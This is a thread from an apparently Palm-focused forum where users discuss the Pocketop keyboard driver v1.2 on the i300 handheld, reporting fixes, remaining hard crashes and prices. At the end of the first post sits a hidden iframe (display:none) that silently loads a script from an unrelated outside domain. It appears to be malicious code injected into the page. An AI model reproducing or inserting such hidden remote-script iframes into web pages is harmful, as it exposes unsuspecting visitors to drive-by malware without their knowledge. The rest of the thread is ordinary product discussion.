+ Reply to Thread

I WANT AN AWARD! :) for first posting this news:Poctetop Keyboard driver v 1.2

They've done it. The buggy v 1.0 Pocketop Keyboard has been refined. I just installed V 1.2 from the Pocketop Website and it works flawlessly on my beloved I300. No more "enable-disable dance" of the keyboard driver when imputing w/ graffitti....That alone kept me from using Datebk 5. I know there are keyboard enthusiasts out there who've beeen wallowing in despair because the Pocketop was not their Messiah. But V 1.2 has come to redeem the sins of V 1.0. Rejoice gadget geeks a new day has dawned. The keyboard driver is now activated by dragging the stylus horizontally across the graffiti area from one (left or right ) icon to another. INSTEAD OF depressing the stylus for 2 seconds and then releasing. Run and download and rejoice V 1.2 has risen.
    Also I wouldn't mind receiving effusive praise for being the first person to report this good news. I hope this makes somebody's day. I am a happy camper. http://www.pocketop.net/index.shtml
    ....and thanks everybody for sharing all the info I've benefited from on this forum,
    Eddie<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

PalmVenue Guy
    Great news, I downloaded it and now I'm experiencing zero problems as well!

~Kimberly
    EDDIE,

I am the eternal pessimist, but if this new driver works.....I will be Ooooooo so greatful.

I ended up deleting my beloved driver because A) couldn't stand the able/disable dance and B) the stupid driver would be enabled without my knowledge and crash my I300.

What about the 15 minute crash cycle? Many had posted, and I personally experienced, the ever loathsome crash after about 15 minutes of use of the keyboard. Would I be asking too much for this new driver to correct that situation?

Kimberly
    Don't shake my tree if you don't like my peaches!!!

Hi, can somebody post an update of the new drivers from this pocketop. Are all the problems and concerns with the software gone with the new drivers?.

I'm looking forward in buying this keyboard, (now its getting really cheap! [$20-$30] ) So I was thinking of getting me one, for school notes and stuff. But I have heard a lot of problems with the old drivers, kilo says that there are now zero problems. is this true.
    visit http://www.yorch.net your place for Pocket Pc Phone Edition Dialpad Skins!

~Kimberly
    Originally posted by yorch
    Hi, can somebody post an update of the new drivers from this pocketop. Are all the problems and concerns with the software gone with the new drivers?.

.... kilo says that there are now zero problems. is this true.
    Well, I downloaded the new driver on Thursday and while using the keyboard for the AIM Messenger application experienced a hard crash. I have not used the keyboard, extensively, since then and am hoping that it was a fluke. I was extremely excited about this keyboard when it originally debuted and am still holding out hope that the developers will come thru with a stable driver for our beloved I300s.

By the way, the I300 still has not been added to the keyboard compatibility list, even though the keyboards developers promised "more extensive testing" and the probable addition of the I300 within "6 weeks" (now 3 months ago!)

Kimberly
    Don't shake my tree if you don't like my peaches!!!

Hard Reset

I've also had 2 hard resets w/ keyboard. while using Wordsmith doing heavy scrolling. I'm backing up more carefullly...(will purchase Backupbuddy this week) I'll report progress. This driver is working much more reliably that V 1.0. There will be further upgrades of this driver. Hey where are you getting this for $30 I paid $100 -$20 = $80.
    Eddie